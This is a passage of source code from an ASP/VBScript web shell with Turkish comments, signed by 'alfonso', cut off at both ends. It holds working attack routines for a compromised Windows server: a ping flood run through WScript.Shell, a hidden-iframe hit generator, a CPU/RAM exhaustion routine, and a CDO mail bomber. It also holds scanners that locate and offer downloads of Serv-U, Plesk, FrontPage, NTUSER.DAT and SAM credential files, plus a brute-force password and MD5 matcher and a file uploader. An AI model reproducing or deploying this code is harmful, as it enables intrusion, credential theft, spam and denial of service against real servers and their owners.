Response.Write downStr&"<font class=""k1""><a href='"&FilePath&"?mode=5&konum="&konum&"&del="&f12.path&"&Time="&time&"'> û </a><a href='"&FilePath&"?mode=10&file="&f12.path&"&konum="&konum&"&Time="&time&"'> ! </a></font> - <a href='"&dosyapath&"?mode=9&file="&f12.path&"&konum="&konum&"&Time="&time&"'>"&f12.path&" [<font color=yellow>"&f12.size&"</font>]"&"</a></b><br></td></tr></table>"
i=i+1
end if
end if
Response.Flush
next
set f2 = nothing
set fc2 = nothing
Call arama(f1.path)
next
set f = nothing
set fc = nothing
end sub
Sub Ping_Bomb_alfonso(alfonsosite,alfonsopings,alfonsotimeout,alfonsobyte)
'/// by alfonso. özel modüller ekledim =). Ne Mutlu TÜRKÜM DÝYENE.
noattack = 1
bonus = 0
If alfonsopings = "" Then alfonsopings = 4
If alfonsopings = 0 Then alfonsopings = 4
If alfonsotimeout = "" Then alfonsotimeout = 750
If InStr(alfonsosite,"savsak") > 0 or InStr(alfonsosite,"yagmurlu") or InStr(alfonsosite,"gov.tr") > 0 then noattack = 0
If InStr(alfonsosite,"cyber") > 0 or InStr(alfonsosite,"tahri") > 0 or InStr(alfonsosite,"hack") > 0 or InStr(alfonsosite,"team") > 0 then bonus = 1
response.write "<textarea style='width:100%;height:350;' >"
if noattack = 1 then
if bonus = 1 then
alfonsopings = alfonsopings * 20
response.write "Ekstra *20 Bonus kazandýn. "
end if
Set Sh = CreateObject("WScript.Shell")
if alfonsobyte = "" then
Set ExCmd = Sh.Exec("ping -n " & alfonsopings _
& " -w " & alfonsotimeout & " " & alfonsosite)
else
Set ExCmd = Sh.Exec("ping -n " & alfonsopings _
& " -w " & alfonsotimeout & " " & alfonsosite & " -l " & alfonsobyte)
end if
depola = ExCmd.StdOut.ReadAll
response.write depola
Select Case InStr(ExCmd.StdOut.Readall,"TTL=")
Case 0 IsConnectable = False
Case Else IsConnectable = True
End Select
else
response.write "Tasvip Etmediðimiz Bir siteye Saldýrý yapýyorsun. Tekrarlama Kötü olur senin için. CIZZZ =) euheu by alfonso "
response.write "Bu FSO sahibine, GOv.TR ve Com.TR sitelere karþý Koruma gerçekleþtirildi. TÜRK TÜRK ü VURMAZ.. Kalleþlik yapma by alfonso "
response.cookies("alfonso") = "1"
response.cookies("alfonso").expires = now + 365
count=0
end if
response.write "</textarea>"
End Sub
Sub Somurgen(filex,urlx)
for i=0 to CInt(filex)
response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td>"&i&". Robot Baðlandý..</td></tr></table>"
response.Write "<iframe style='width:0; height:0' src='"&urlx&"'></iframe>"
next
End Sub
Sub Ram_Cpu
on error resume next
response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'><b> RAM & CPU FUcker for SERVER by alfonso =) 1.0 </b></td></tr></table>"
response.write "<br><br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'> ZARAR verme MEkanizmasý Devrede... </td></tr></table>"
response.write "<br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'> Durdurmak için Pencereyi kapat. Her 2 Saniyede bir 3 program açýlýyor...</td></tr></table>"
response.write "<br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'> <b>by alfonso</b></td></tr></table>"
response.Write "<iframe style='width:0; height:0' src='"&FilePath&"?mode=31&islem=1'></iframe>"
response.Write "<iframe style='width:0; height:0' src='"&FilePath&"?mode=31&islem=2'></iframe>"
response.Write "<iframe style='width:0; height:0' src='"&FilePath&"?mode=31&islem=3'></iframe>"
response.write "<META http-equiv=refresh content=2;URL='"&FilePath&"?mode=31&file=1'>"
response.flush
end Sub
function TextYarat(intLen)
str=""
Randomize
for i=1 to intLen
str=str & Mid(charset,Int((Len(charset)-1+1)*Rnd+1),1)
next
TextYarat=str
end function
function MailSec()
dim strNewText,i
str=""
Randomize
mail = mail_array(round(rnd()*4))
uzanti = uzanti_array(round(rnd()*6))
str = "@"& mail &"."& uzanti
MailSec = str
end function
function MailKorumasi(mailx)
MailKorumasi = 0
for i=0 to 9
If Instr(UCASE(mailx), yasak_array(i)) Then
MailKorumasi = 1
end if
next
end function
Function MailYarat()
MailYarat = TextYarat(8) & MailSec()
end function
Function TextYarat2()
TextYarat2 = TextYarat(200)
end function
Function BaslikYarat()
BaslikYarat = TextYarat(10)
end function
Sub MailBomber_by_alfonso(alicix)
response.cookies("bilesen") = "1"
on error resume next
Set mailObj = Server.CreateObject("CDONTS.NewMail")
mailObj.From = MailYarat()
mailObj.To = alicix
mailObj.Subject = BaslikYarat()
mailObj.Body = TextYarat2()
mailObj.Send
Set mailObj = Nothing
if err <> 0 then
on error resume next
Set mailObj = Server.CreateObject("CDO.Message")
mailObj.From = MailYarat()
mailObj.To = alicix
mailObj.Subject = BaslikYarat()
mailObj.TextBody = TextYarat2()
mailObj.Send
Set mailObj = Nothing
if err <> 0 then
response.cookies("bilesen") = "0"
end if
end if
End Sub
Sub yazorta(yazx)
response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'> "&yazx&" </td></tr></table>"
End Sub
Sub yazsol(yazx)
response.write "<table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='left'> "&yazx&" </td></tr></table>"
End Sub
Sub yazortaa(yazx)
response.write "<br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='center'> "&yazx&" </td></tr></table>"
End Sub
Sub yazsoll(yazx)
response.write "<br><table align=""center"" width=""100%"" class=""kbrtm""><tr><td align='left'> "&yazx&" </td></tr></table>"
End Sub
Function OS()
on error resume next
strComputer = "."
Set objWMI = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set colItems = objWMI.ExecQuery("Select * from Win32_OperatingSystem",,48)
For Each objItem in colItems
VerBig = Left(objItem.Version,3)
Next
Select Case VerBig
Case "5.0" OSystem = "W2K"
Case "5.1" OSystem = "XP"
Case "5.2" OSystem = "Windows 2003"
Case "4.0" OSystem = "NT 4.0**"
Case Else OSystem = "Unknown - probably Win 9x"
End Select
OS = OSystem
End Function
Sub FolderExistx(yer)
if FSO.FolderExists(yer) then
yazorta("<font class=""k1""><a title="" Dizini Kopyala & Taþý "" href='"&FilePath&"?mode=2&konum="&yer&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a></font> <font class=""k1""><a title="" Dizini Sil "" href='"&FilePath&"?mode=4&konum="&yer&"&del="&yer&"&Time="&time&"'>û</a> 1</font><font size=2><b><a title="" Dizinin içine Gir "" href='"&FilePath&"?konum="&yer&"&Time="&time&"'> "&yer&"</a></b>")
end if
End Sub
Sub alfonsoServuRemote()
j=0
servu = array("C:\Program Files\base.ini","C:\base.ini","C:\Program Files\Serv-U\base.ini","C:\Program Files\Serv-U\ServUAdmin.ini","C:\Program Files\Serv-U\SERV-U.ini","C:\Program Files\Serv-U\ServUDaemon.ini","C:\Program Files\SERV-U.ini","C:\SERV-U.ini","C:\Program Files\ServUDaemon.ini","C:\ServUDaemon.ini","C:\Program Files\WS_FTP.ini","C:\WS_FTP.ini","C:\Program Files\WS_FTP\WS_FTP.ini","C:/Program Files/Gene6 FTP Server/RemoteAdmin/remote.ini","C:/users.txt","D:/users.txt","E:/users.txt")
for i=0 to 16
if FSO.FileExists(servu(i)) then
downStr = "<a title=""Dosyayý Sil"" href='"&FilePath&"?mode=5&konum="&FolderPath&"&del="&FolderPath&"\"&servu(i)&"&Time="&time&"'>û</a><font face=webdings><a title="" Download et "" href='"&FilePath&"?mode=6&file="&servu(i)&"&konum="&FolderPath&"&Time="&time&"'>Í</a></font><font face=wingdings><a title="" Dosyayý Kopyala & Taþý "" href='"&FilePath&"?mode=7&file="&servu(i)&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a><a title="" Dosya Ad & Format Deðiþtir "" href='"&FilePath&"?mode=16&file="&servu(i)&"&islem="&servu(i)&"&konum="&FolderPath&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">?</a></font>"
yazorta("<a title="" Ýçini Görüntülemek için Týkla "" href='"&FilePath&"?mode=9&file="&servu(i)&"&konum="&FolderPath&"&Time="&time&"'>"&servu(i)&"</a></b> <font face=wingdings size=4>± <a title="" Dosyayý Editlemek için Týkla by alfonso :) "" href='"&FilePath&"?mode=10&file="&servu(i)&"&Time="&time&"&konum="&FolderPath&"'>!</a>"&downStr&"</font>")
j=j+1
end if
next
if j = 0 then
yazorta("<center><font color=#FE7A84> <font face=Wingdings size=5>N</font> Remote olarak Sonuç bulunamadý. Geliþmiþ aramayý seçiniz. <font face=Wingdings size=5>N</font> </font>")
end if
servufolder = array("C:\Program Files\Serv-U","C:/Program Files/Gene6 FTP Server/RemoteAdmin","C:/Program Files/Gene6 FTP Server/Accounts/Helm FTP Users/users")
for i=0 to 2
FolderExistx(servufolder(i))
next
End Sub
Sub alfonsoPleskRemote()
j=0
plesk = array("c:/Program Files/SWsoft/Plesk/MySQL/Data/mysql","c:/Program Files/SWsoft/Plesk","c:/Program Files/SWsoft/Plesk/MySQL/Data/psa","c:/Program Files/SWsoft/Plesk/Databases/MySQL/Data/mysql","c:\Program Files\swsoft\autsav.sav")
for i=0 to 3
if FSO.FolderExists(plesk(i)) then
yazorta("<font class=""k1""><a title="" Dizini Kopyala & Taþý "" href='"&FilePath&"?mode=2&konum="&plesk(i)&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a></font> <font class=""k1""><a title="" Dizini Sil "" href='"&FilePath&"?mode=4&konum="&plesk(i)&"&del="&plesk(i)&"&Time="&time&"'>û</a> 1</font><font size=2><b><a title="" Dizinin içine Gir "" href='"&FilePath&"?konum="&plesk(i)&"&Time="&time&"'>"&plesk(i)&"</a></b>")
j=j+1
end if
next
if j = 0 then
yazorta("<center><font color=#FE7A84> <font face=Wingdings size=5>N</font> "&plesk(0)&" ve "&plesk(1)&" dizinleri bulunamadý. <font face=Wingdings size=5>N</font> </font>")
end if
if FSO.FileExists(plesk(4)) then
downStr = "<a title=""Dosyayý Sil"" href='"&FilePath&"?mode=5&konum="&FolderPath&"&del="&FolderPath&"\"&servu(i)&"&Time="&time&"'>û</a><font face=webdings><a title="" Download et "" href='"&FilePath&"?mode=6&file="&servu(i)&"&konum="&FolderPath&"&Time="&time&"'>Í</a></font><font face=wingdings><a title="" Dosyayý Kopyala & Taþý "" href='"&FilePath&"?mode=7&file="&servu(i)&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a><a title="" Dosya Ad & Format Deðiþtir "" href='"&FilePath&"?mode=16&file="&servu(i)&"&islem="&servu(i)&"&konum="&FolderPath&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">?</a></font>"
yazorta("<a title="" Ýçini Görüntülemek için Týkla "" href='"&FilePath&"?mode=9&file="&servu(i)&"&konum="&FolderPath&"&Time="&time&"'>"&servu(i)&"</a></b> <font face=wingdings size=4>± <a title="" Dosyayý Editlemek için Týkla by alfonso :) "" href='"&FilePath&"?mode=10&file="&servu(i)&"&Time="&time&"&konum="&FolderPath&"'>!</a>"&downStr&"</font>")
else
yazorta("<center><font color=#FE7A84> <font face=Wingdings size=5>N</font> Plesk'in Autsav.sav Dosyasý bulunamadý. <font face=Wingdings size=5>N</font> </font>")
end if
End Sub
Sub alfonsoSam()
Err.Number=0
on error resume next
Set MyFile = FSO.CreateTextFile("C:config\test.alfonso", True)
MyFile.write " ALFONSO Was Here... =) "
set MyFile = Nothing
if Err.Number <> 0 then
response.write "<center> <b><font color=#FBE1D7>Yaz :</font></b> <font color=#FE7A84 class=""k1"">û</font> "
else
response.write "<center> <b><font color=#FAFEDE>Yaz :</font></b> <font color=#C6FCBE class=""k1"">ü</font> "
end if
Err.Number=0
on error resume next
FSO.DeleteFile "C:config\test.alfonso",true
if Err.Number <> 0 then
response.write " <b><font color=#FBE1D7>Sil :</font></b> <font color=#FE7A84 class=""k1"">û</font> </center>"
else
response.write " <b><font color=#FAFEDE>Sil :</font></b> <font color=#C6FCBE class=""k1"">ü</font> </center>"
end if
on error resume next
url = "C:config\"
Set f = FSO.GetFolder(url)
if err <> 0 then
url = "C:\WINDOWS\system32\config\"
Set f = FSO.GetFolder(url)
end if
Set fc = f.Files
For Each f1 In fc
downStr = "<a title=""Dosyayý Sil"" href='"&FilePath&"?mode=5&konum="&url&"&del="&url&""&f1.name&"&Time="&time&"'>û</a><font face=webdings><a title="" Download et "" href='"&FilePath&"?mode=6&file="&url&""&f1.name&"&konum="&url&"&Time="&time&"'>Í</a></font><font face=wingdings><a title="" Dosyayý Kopyala & Taþý "" href='"&FilePath&"?mode=7&file="&url&""&f1.name&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a><a title="" Dosya Ad & Format Deðiþtir "" href='"&FilePath&"?mode=16&file="&url&""&f1.name&"&islem="&f1.name&"&konum="&FolderPath&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">?</a></font>"
yazorta("<a title="" Ýçini Görüntülemek için Týkla "" href='"&FilePath&"?mode=9&file="&url&""&f1.Name&"&konum="&url&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>± <a title="" Dosyayý Editlemek için Týkla by alfonso :) "" href='"&FilePath&"?mode=10&file="&url&""&f1.name&"&Time="&time&"&konum="&url&"'>!</a>"&downStr&"</font>")
Next
end Sub
Sub alfonsoVti_Pvt()
j=0
local = request.servervariables("APPL_PHYSICAL_PATH")
vti = array(""&local&"\_vti_pvt\access.cnf",""&local&"\..\_vti_pvt\access.cnf",""&local&"\..\..\_vti_pvt\access.cnf",""&local&"\..\..\..\_vti_pvt\access.cnf",""&local&"\_vti_pvt\postinfo.html",""&local&"\..\_vti_pvt\postinfo.html",""&local&"\..\..\_vti_pvt\postinfo.html",""&local&"\..\..\..\_vti_pvt\postinfo.html",""&local&"\vti_pvt/service.pwd",""&local&"\..\vti_pvt/service.pwd",""&local&"\..\..\vti_pvt/service.pwd",""&local&"\..\..\..\vti_pvt/service.pwd")
for i=0 to 11
if FSO.FileExists(vti(i)) then
downStr = "<a title=""Dosyayý Sil"" href='"&FilePath&"?mode=5&konum="&FolderPath&"&del="&FolderPath&"\"&vti(i)&"&Time="&time&"'>û</a><font face=webdings><a title="" Download et "" href='"&FilePath&"?mode=6&file="&vti(i)&"&konum="&FolderPath&"&Time="&time&"'>Í</a></font><font face=wingdings><a title="" Dosyayý Kopyala & Taþý "" href='"&FilePath&"?mode=7&file="&vti(i)&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a><a title="" Dosya Ad & Format Deðiþtir "" href='"&FilePath&"?mode=16&file="&vti(i)&"&islem="&vti(i)&"&konum="&FolderPath&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">?</a></font>"
yazorta("<a title="" Ýçini Görüntülemek için Týkla "" href='"&FilePath&"?mode=9&file="&vti(i)&"&konum="&FolderPath&"&Time="&time&"'>"&vti(i)&"</a></b> <font face=wingdings size=4>± <a title="" Dosyayý Editlemek için Týkla by alfonso :) "" href='"&FilePath&"?mode=10&file="&vti(i)&"&Time="&time&"&konum="&FolderPath&"'>!</a>"&downStr&"</font>")
j=j+1
end if
next
if j = 0 then
yazorta("<center><font color=#FE7A84> <font face=Wingdings size=5>N</font> Sonuç bulunamadý. Daha geniþ Arama yapýn by alfonso <font face=Wingdings size=5>N</font> </font>")
end if
end sub
Sub alfonsoNTUser(oturum)
j=0
ntuser = array("c:\documents and settings\"&oturum&"\NTUSER.DAT","c:\documents and settings\Administrator\NTUSER.DAT","c:\documents and settings\"&oturum&"\ntuser.dat.log","c:\documents and settings\Administrator\ntuser.dat.log","c:\documents and settings\"&oturum&"\ntuser.ini","c:\documents and settings\Administrator\ntuser.ini")
for i=0 to 5
if FSO.FileExists(ntuser(i)) then
downStr = "<a title=""Dosyayý Sil"" href='"&FilePath&"?mode=5&konum="&FolderPath&"&del="&FolderPath&"\"&ntuser(i)&"&Time="&time&"'>û</a><font face=webdings><a title="" Download et "" href='"&FilePath&"?mode=6&file="&ntuser(i)&"&konum="&FolderPath&"&Time="&time&"'>Í</a></font><font face=wingdings><a title="" Dosyayý Kopyala & Taþý "" href='"&FilePath&"?mode=7&file="&ntuser(i)&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a><a title="" Dosya Ad & Format Deðiþtir "" href='"&FilePath&"?mode=16&file="&ntuser(i)&"&islem="&ntuser(i)&"&konum="&FolderPath&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">?</a></font>"
yazorta("<a title="" Ýçini Görüntülemek için Týkla "" href='"&FilePath&"?mode=9&file="&ntuser(i)&"&konum="&FolderPath&"&Time="&time&"'>"&ntuser(i)&"</a></b> <font face=wingdings size=4>± <a title="" Dosyayý Editlemek için Týkla by alfonso :) "" href='"&FilePath&"?mode=10&file="&ntuser(i)&"&Time="&time&"&konum="&FolderPath&"'>!</a>"&downStr&"</font>")
j=j+1
end if
next
if j = 0 then
yazorta("<center><font color=#FE7A84> <font face=Wingdings size=5>N</font> Sonuç bulunamadý. Daha geniþ Arama yapýn by alfonso <font face=Wingdings size=5>N</font> </font>")
end if
end sub
Sub alfonsoRepair()
Err.Number=0
on error resume next
Set MyFile = FSO.CreateTextFile("c:..\repair\test.alfonso", True)
MyFile.write " alfonso Was Here... =) "
set MyFile = Nothing
if Err.Number <> 0 then
response.write "<center> <b><font color=#FBE1D7>Yaz :</font></b> <font color=#FE7A84 class=""k1"">û</font> "
else
response.write "<center> <b><font color=#FAFEDE>Yaz :</font></b> <font color=#C6FCBE class=""k1"">ü</font> "
end if
Err.Number=0
on error resume next
FSO.DeleteFile "c:..\repair\test.alfonso",true
if Err.Number <> 0 then
response.write " <b><font color=#FBE1D7>Sil :</font></b> <font color=#FE7A84 class=""k1"">û</font> </center>"
else
response.write " <b><font color=#FAFEDE>Sil :</font></b> <font color=#C6FCBE class=""k1"">ü</font> </center>"
end if
on error resume next
url = "c:..\repair\"
Set f = FSO.GetFolder(url)
if err <> 0 then
url = "C:\WINDOWS\repair\"
Set f = FSO.GetFolder(url)
end if
Set fc = f.Files
For Each f1 In fc
downStr = "<a title=""Dosyayý Sil"" href='"&FilePath&"?mode=5&konum="&url&"&del="&url&""&f1.name&"&Time="&time&"'>û</a><font face=webdings><a title="" Download et "" href='"&FilePath&"?mode=6&file="&url&""&f1.name&"&konum="&url&"&Time="&time&"'>Í</a></font><font face=wingdings><a title="" Dosyayý Kopyala & Taþý "" href='"&FilePath&"?mode=7&file="&url&""&f1.name&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">4</a><a title="" Dosya Ad & Format Deðiþtir "" href='"&FilePath&"?mode=16&file="&url&""&f1.name&"&islem="&f1.name&"&konum="&FolderPath&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;"">?</a></font>"
yazorta("<a title="" Ýçini Görüntülemek için Týkla "" href='"&FilePath&"?mode=9&file="&url&""&f1.Name&"&konum="&url&"&Time="&time&"'>"&f1.name&" [<font color=yellow>"&FormatNumber(f1.size,0)&"</font>]"&"</a></b> <font face=wingdings size=4>± <a title="" Dosyayý Editlemek için Týkla by alfonso :) "" href='"&FilePath&"?mode=10&file="&url&""&f1.name&"&Time="&time&"&konum="&url&"'>!</a>"&downStr&"</font>")
Next
end Sub
Function kodolustur(aralik)
' belirtitiim aralýkda kod oluþtuuyorurum. 01#01#01#01# baþlangýç iiçin by alfonso
dim coding
coding = ""
for i=1 to CInt(aralik)
coding = coding + "01#"
next
kodolustur = coding
End Function
Function diziolustur()
' Seçilen Charset leri burda birleþtiriyorum by alfonso
Dim dizi
dizi=""
if not k1 = "" then dizi = dizi & karakter1
if not k2 = "" then dizi = dizi & karakter2
if not k3 = "" then dizi = dizi & karakter3
if not k4 = "" then dizi = dizi & karakter4
diziolustur = dizi
End Function
Function Sifreyarat(codex,aralik,dizix)
' Stirng kodunu saðdan çözümleyerek Þifre yaratýyor by ALFONSO
dim hash
dim sifre
hash=""
sifre=""
i=CInt(aralik)
Do While i>0
hash = CInt(Mid(codex,((i-1)*3)+1,2)) ' Saðdan sayýlarý alýyor.
sifre = Mid(dizix,hash,1) & sifre
i=i-1
Loop
Sifreyarat = sifre
End Function
Function SonrakiAdim(codex,aralik,dizix)
' sonraki adýma hazýrlýk coded by alfonso ;)
Dim hash
hash = ""
increment=0
goup=0
hashing = ""
i=CInt(aralik)
Do While i>0
hash = CInt(Mid(codex,((i-1)*3)+1,2)) ' Saðdan sayýlarý alýyor.
' Carry out ý diðeirne giriþ yap increment the next one
if hash => Len(dizix) then
increment = 1
hash = 1
else if increment = 1 then
hash = hash+1
increment = 0
end if
end if
' eðer ara1 hanelki þifreleme bitti ise diðeirne ýkamsý gerek ara1++
if i = 1 AND hash>= Len(dizix)-1 then goup=1
' Brute bitiþini gösteriiyorum.
if i = CInt(aralik) AND hash>= Len(dizix) AND ara1 = ara2 then getend=1 ''' BRUTE çýkýþý bittiðini analýyorumm GETEND =1 !!!!!!!!!!!!!
' hash i bir sonraki adýma hazýrla
if i = CInt(aralik) then hash = hash + 1
'yeni hash numarasý oluþtur
if hash <10 then hash = "0" & hash
hashing = hash &"#" & hashing
i=i-1
Loop
coding = hashing
' eðerki goup =1 then hane atla ve yeni stireg olþutur
if goup = 1 then
coding = ""
ara1 = CInt(aralik) + 1
for j=1 to ara1
coding = coding + "01#"
next
end if
SonrakiAdim = coding
End Function
Sub Cookyaz(str1,str2,str3)
if not str3 = "" then
response.cookies(str1)("str2") = str3
response.cookies(str1).expires = now+100
session("say") = CInt(session("say")) + 1
end if
End Sub
Sub HashFounded(str1,str2)
if not request.cookies(str1)("sifre") = "" then
yazsol("<b>Bulundu: "&request.cookies(str1)(str2)&" ->> "&request.cookies(str1)("sifre")&" </b>")
inject3 = CInt(inject3) + 1
end if
End Sub
Sub hashyes(str1,str2,md5x,pwd)
if not request.cookies(str1)(str2) = "" AND UCASE(request.cookies(str1)(str2)) = md5x then
yazsol("BULDUuuuuuuuuuuuuuuu " & pwd & " - " & request.cookies(str1)(str2)&"")
response.cookies(str1)("sifre") = pwd
end if
End Sub
'************************* ZORUNLU UPLOAD için GEREKLi =(( **********************************************************************************************
Class clsUpload
Private mbinData
Private mlngChunkIndex
Private mlngBytesReceived
Private mstrDelimiter
Private CR
Private LF
Private CRLF
Private mobjFieldAry()
Private mlngCount
Private Sub RequestData
Dim llngLength
mlngBytesReceived = Request.TotalBytes
mbinData = Request.BinaryRead(mlngBytesReceived)
End Sub
Private Sub ParseDelimiter()
mstrDelimiter = MidB(mbinData, 1, InStrB(1, mbinData, CRLF) - 1)
End Sub
Private Sub ParseData()
Dim llngStart
Dim llngLength
Dim llngEnd
Dim lbinChunk
llngStart = 1
llngStart = InStrB(llngStart, mbinData, mstrDelimiter & CRLF)
While Not llngStart = 0
llngEnd = InStrB(llngStart + 1, mbinData, mstrDelimiter) - 2
llngLength = llngEnd - llngStart
lbinChunk = MidB(mbinData, llngStart, llngLength)
Call ParseChunk(lbinChunk)
llngStart = InStrB(llngStart + 1, mbinData, mstrDelimiter & CRLF)
Wend
End Sub
Private Sub ParseChunk(ByRef pbinChunk)
Dim lstrName
Dim lstrFileName
Dim lstrContentType
Dim lbinData
Dim lstrDisposition
Dim lstrValue
lstrDisposition = ParseDisposition(pbinChunk)
lstrName = ParseName(lstrDisposition)
lstrFileName = ParseFileName(lstrDisposition)
lstrContentType = ParseContentType(pbinChunk)
If lstrContentType = "" Then
lstrValue = CStrU(ParseBinaryData(pbinChunk))
Else
lbinData = ParseBinaryData(pbinChunk)
End If
Call AddField(lstrName, lstrFileName, lstrContentType, lstrValue, lbinData)
End Sub
Private Sub AddField(ByRef pstrName, ByRef pstrFileName, ByRef pstrContentType, ByRef pstrValue, ByRef pbinData)
Dim lobjField
ReDim Preserve mobjFieldAry(mlngCount)
Set lobjField = New clsField
lobjField.Name = pstrName
lobjField.FilePath = pstrFileName
lobjField.ContentType = pstrContentType
If LenB(pbinData) = 0 Then
lobjField.BinaryData = ChrB(0)
lobjField.Value = pstrValue
lobjField.Length = Len(pstrValue)
Else
lobjField.BinaryData = pbinData
lobjField.Length = LenB(pbinData)
lobjField.Value = ""
End If
Set mobjFieldAry(mlngCount) = lobjField
mlngCount = mlngCount + 1
End Sub
Private Function ParseBinaryData(ByRef pbinChunk)
Dim llngStart
llngStart = InStrB(1, pbinChunk, CRLF & CRLF)
If llngStart = 0 Then Exit Function
llngStart = llngStart + 4
ParseBinaryData = MidB(pbinChunk, llngStart)
End Function
Private Function ParseContentType(ByRef pbinChunk)
Dim llngStart
Dim llngEnd
Dim llngLength
llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Type:"), vbTextCompare)
If llngStart = 0 Then Exit Function
llngEnd = InStrB(llngStart + 15, pbinChunk, CR)
If llngEnd = 0 Then Exit Function
llngStart = llngStart + 15
If llngStart >= llngEnd Then Exit Function
llngLength = llngEnd - llngStart
ParseContentType = Trim(CStrU(MidB(pbinChunk, llngStart, llngLength)))
End Function
Private Function ParseDisposition(ByRef pbinChunk)
Dim llngStart
Dim llngEnd
Dim llngLength
llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Disposition:"), vbTextCompare)
If llngStart = 0 Then Exit Function
llngEnd = InStrB(llngStart + 22, pbinChunk, CRLF)
If llngEnd = 0 Then Exit Function
llngStart = llngStart + 22
If llngStart >= llngEnd Then Exit Function
llngLength = llngEnd - llngStart
ParseDisposition = CStrU(MidB(pbinChunk, llngStart, llngLength))
End Function
Private Function ParseName(ByRef pstrDisposition)
Dim llngStart
Dim llngEnd
Dim llngLength
llngStart = InStr(1, pstrDisposition, "name=""", vbTextCompare)
If llngStart = 0 Then Exit Function
llngEnd = InStr(llngStart + 6, pstrDisposition, """")
If llngEnd = 0 Then Exit Function
llngStart = llngStart + 6
If llngStart >= llngEnd Then Exit Function
llngLength = llngEnd - llngStart
ParseName = Mid(pstrDisposition, llngStart, llngLength)
End Function
Private Function ParseFileName(ByRef pstrDisposition)
Dim llngStart
Dim llngEnd
Dim llngLength
llngStart = InStr(1, pstrDisposition, "filename=""", vbTextCompare)
If llngStart = 0 Then Exit Function
llngEnd = InStr(llngStart + 10, pstrDisposition, """")
If llngEnd = 0 Then Exit Function
llngStart = llngStart + 10
If llngStart >= llngEnd Then Exit Function
llngLength = llngEnd - llngStart
ParseFileName = Mid(pstrDisposition, llngStart, llngLength)
End Function
Public Property Get Count()
Count = mlngCount
End Property
Public Default Property Get Fields(ByVal pstrName)
Dim llngIndex
If IsNumeric(pstrName) Then
llngIndex = CLng(pstrName)
If llngIndex > mlngCount - 1 Or llngIndex < 0 Then
Call Err.Raise(vbObjectError + 1, "clsUpload.asp", "Object does not exist within the ordinal reference.")
Exit Property
End If
Set Fields = mobjFieldAry(pstrName)
Else
pstrName = LCase(pstrname)
For llngIndex = 0 To mlngCount - 1
If LCase(mobjFieldAry(llngIndex).Name) = pstrName Then
Set Fields = mobjFieldAry(llngIndex)
Exit Property
End If
Next
End If
Set Fields = New clsField
End Property
Private Sub Class_Terminate()
Dim llngIndex
For llngIndex = 0 To mlngCount - 1
Set mobjFieldAry(llngIndex) = Nothing
Next
ReDim mobjFieldAry(-1)
End Sub
Private Sub Class_Initialize()
ReDim mobjFieldAry(-1)
CR = ChrB(Asc(vbCr))
LF = ChrB(Asc(vbLf))
CRLF = CR & LF
mlngCount = 0
Call RequestData
Call ParseDelimiter()
Call ParseData
End Sub
Private Function CStrU(ByRef pstrANSI)
Dim llngLength
Dim llngIndex
llngLength = LenB(pstrANSI)
For llngIndex = 1 To llngLength
CStrU = CStrU & Chr(AscB(MidB(pstrANSI, llngIndex, 1)))
Next
End Function
Private Function CStrB(ByRef pstrUnicode)
Dim llngLength
Dim llngIndex
llngLength = Len(pstrUnicode)
For llngIndex = 1 To llngLength
CStrB = CStrB & ChrB(Asc(Mid(pstrUnicode, llngIndex, 1)))
Next
End Function
End Class
Class clsField
Public Name
Private mstrPath
Public FileDir
Public FileExt
Public FileName
Public ContentType
Public Value
Public BinaryData
Public Length
Private mstrText
Public Property Get BLOB()
BLOB = BinaryData
End Property
Public Function BinaryAsText()
Dim lbinBytes
Dim lobjRs
If Length = 0 Then Exit Function
If LenB(BinaryData) = 0 Then Exit Function
If Not Len(mstrText) = 0 Then
BinaryAsText = mstrText
Exit Function
End If
lbinBytes = ASCII2Bytes(BinaryData)
mstrText = Bytes2Unicode(lbinBytes)
BinaryAsText = mstrText
End Function
Public Sub SaveAs(ByRef pstrFileName)
Const adTypeBinary=1
Const adSaveCreateOverWrite=2
Dim lobjStream
Dim lobjRs
Dim lbinBytes
If Length = 0 Then Exit Sub
If LenB(BinaryData) = 0 Then Exit Sub
Set lobjStream = Server.CreateObject("ADODB.Stream")
lobjStream.Type = adTypeBinary
Call lobjStream.Open()
lbinBytes = ASCII2Bytes(BinaryData)
Call lobjStream.Write(lbinBytes)
On Error Resume Next
Call lobjStream.SaveToFile(pstrFileName, adSaveCreateOverWrite)
'if err<>0 then response.Write "<br>"&err.Description
Call lobjStream.Close()
Set lobjStream = Nothing
End Sub
Public Property Let FilePath(ByRef pstrPath)
mstrPath = pstrPath
If Not InStrRev(pstrPath, ".") = 0 Then
FileExt = Mid(pstrPath, InStrRev(pstrPath, ".") + 1)
FileExt = UCase(FileExt)
End If
If Not InStrRev(pstrPath, "\") = 0 Then
FileName = Mid(pstrPath, InStrRev(pstrPath, "\") + 1)
End If
If Not InStrRev(pstrPath, "\") = 0 Then
FileDir = Mid(pstrPath, 1, InStrRev(pstrPath, "\") - 1)
End If
End Property
Public Property Get FilePath()
FilePath = mstrPath
End Property
private Function ASCII2Bytes(ByRef pbinBinaryData)
Const adLongVarBinary=205
Dim lobjRs
Dim llngLength
